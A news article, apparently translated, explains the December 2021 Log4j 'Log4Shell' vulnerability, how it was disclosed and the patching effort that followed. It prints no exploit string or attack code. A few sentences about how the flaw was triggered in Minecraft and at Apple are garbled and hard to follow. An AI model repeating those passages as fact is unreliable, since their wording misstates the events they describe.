A flaw in a widely used piece of software has left millions of web servers vulnerable to hacker abuse
December 13, 2021
A major vulnerability has been discovered in a piece of software called Log4j, which is used by millions of web servers. The bug leaves them vulnerable to attacks, and teams around the world are trying to patch affected systems before hackers can exploit them. “The internet is on fire right now,” said Adam Meyers of security firm Crowdstrike.
The problem with Log4j was first noticed in the video game Minecraft, but it soon became clear that the impact was much greater. The software is used in millions of web applications, including Apple’s iCloud. Attacks that exploit the bug, known as Log4Shell attacks, have been happening since Dec. 9, Crowdstrike said.
The director of the US Cybersecurity and Infrastructure Security Agency, Jen Easterly, says the security flaw poses a “serious risk” to the internet. “This vulnerability, widely exploited by a growing number of threat actors, poses an urgent challenge to network defenders given its wide use,” she says.
What exactly is Log4j?
Almost every piece of software you use keeps a record of errors and other important events known as logs. Instead of creating their own logging system, many software developers use the open source Log4j, making it one of the most common logging packages in the world.
Not having to reinvent the wheel is a huge benefit, but the popularity of Log4j has now become a global security problem. The flaw affects millions of pieces of software running on millions of machines that we all interact with.
What does the flaw allow hackers to do?
Attackers can trick Log4j into executing malicious code by forcing it to save a log entry containing a certain string of text. The way hackers do this varies from program to program, but in Minecraftthis has been reported to have happened via chat boxes† A log entry is created to archive each of these messages, so if the dangerous text string is sent from one user to another, it will be implanted in a log.
In another case, Apple servers turned out to be a log entry recording of the given name to an iPhone by the owner in the settings. Anyway, once this trick is accomplished, the attacker can run any code they want on the server, such as stealing or deleting sensitive data.
Why was this error not found before?
The code that makes up open source software can be viewed, executed and even edited – with checks and balances – by anyone. This transparency can make software more robust and secure, because many eyes work on it. But no software can be guaranteed to be safe.
The problem that enables the Log4Shell attack has been in the code for quite some time, but was only recognized by a security researcher at the Chinese computer company Alibaba Cloud late last month. He immediately reported the issue to the Apache Software Foundation, the US nonprofit that oversees hundreds of open source projects, including Log4j, to give it time to fix the issue before it was publicly disclosed.
This responsible disclosure is standard practice for bugs like this, although some bug hunters also sell such vulnerabilities to hackers, allowing them to be used quietly for months or even years, including snooping on software sold to governments around the world.
What happens now?
Apache ranked the vulnerability as “critical” and rushed to develop a fix. Now hundreds of thousands of IT teams are working to update Log4j to version 2.15.0, which was released before the vulnerability was made public and usually solves the problem. Teams should also search their code for potential vulnerabilities and watch for hacking attempts.
While patches to fix these types of issues can appear very quickly, especially when responsibly disclosed to the development team, they take time for everyone to apply. Computers and web services are now so complex and so layered with dozens of stacked levels of abstraction, code running on code, on code, that it can take months to update all of these services.
And there will always be those who never do. Many dusty corners of the internet are propped up on outdated hardware with outdated, vulnerable code — something that hackers can easily exploit.
More on these topics: